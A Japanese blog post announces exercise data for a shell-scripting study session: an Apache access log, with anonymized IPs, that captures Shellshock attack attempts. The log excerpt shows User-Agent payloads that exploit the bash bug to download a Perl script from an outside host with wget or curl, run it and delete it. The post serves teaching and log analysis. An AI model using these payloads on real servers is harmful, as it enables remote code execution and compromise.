第16回シェル芸勉強会で使うログ(邪悪なApache ShellShockログ)を公開します
Wed Apr 1 22:40:05 JST 2015 (modified: Sat Sep 30 16:15:34 JST 2017)
views: 1404, keywords:ログ,apache,shellshock,USP友の会,勉強会,シェル芸,シェル芸勉強会 この記事は最終更新日が7年以上前のものです。
これはエイプリルフールでもなんでもなく、必要なので公開します。当日公開のほうが盛り上がるかなーと思ったのですが、出し惜しみせずに練習してもらった方がよいかと判断しました。第16回シェル芸勉強会のページはこちらです。
今のところ、ログはNASAが公開しているものと、次のShellshock関連のログ(採取元: 私のブログ)を用いようと考えています。ナマのログを出すとあんまりよくないと考え、IPアドレスは頭をすべて192.168に変換しています。
/wp-content/uploads/2015/04/access.log_.shellshock.gz
これが中身です。どんな問題が出るか予想しながらいじってみていただければと。
uedambp:tmp ueda$ gzcat access.log.shellshock.gz | tail -n 3
192.168.193.42 - - [12/Dec/2014:19:23:59 +0900] "GET /phppath/cgi_wrapper HTTP/1.1" 302 227 "-" "() { :;};/usr/bin/perl -e 'print \\"Content-Type: text/plain\\\\r\\\\n\\\\r\\\\nXSUCCESS!\\";system(\\"wget http://192.168.144.163/guide/lx.pl -O /tmp/lx.pl;curl -O /tmp/lx.pl http://192.168.144.163/guide/lx.pl;perl /tmp/lx.pl;rm -rf /tmp/lx.pl*\\");'"
192.168.193.42 - - [12/Dec/2014:19:23:59 +0900] "GET /phppath/php HTTP/1.1" 302 219 "-" "() { :;};/usr/bin/perl -e 'print \\"Content-Type: text/plain\\\\r\\\\n\\\\r\\\\nXSUCCESS!\\";system(\\"wget http://192.168.144.163/guide/lx.pl -O /tmp/lx.pl;curl -O /tmp/lx.pl http://192.168.144.163/guide/lx.pl;perl /tmp/lx.pl;rm -rf /tmp/lx.pl*\\");'"
192.168.225.64 - - [15/Dec/2014:03:12:20 +0900] "GET /phppath/cgi_wrapper HTTP/1.1" 302 227 "-" "() { :;};/usr/bin/perl -e 'print \\"Content-Type: text/plain\\\\r\\\\n\\\\r\\\\nXSUCCESS!\\";system(\\"wget -q http://192.168.63.71/android.txt -O /tmp/android.txt;perl /tmp/android.txt;rm -rf /tmp/android*\\");'"
ヤバイ・・・
寝る。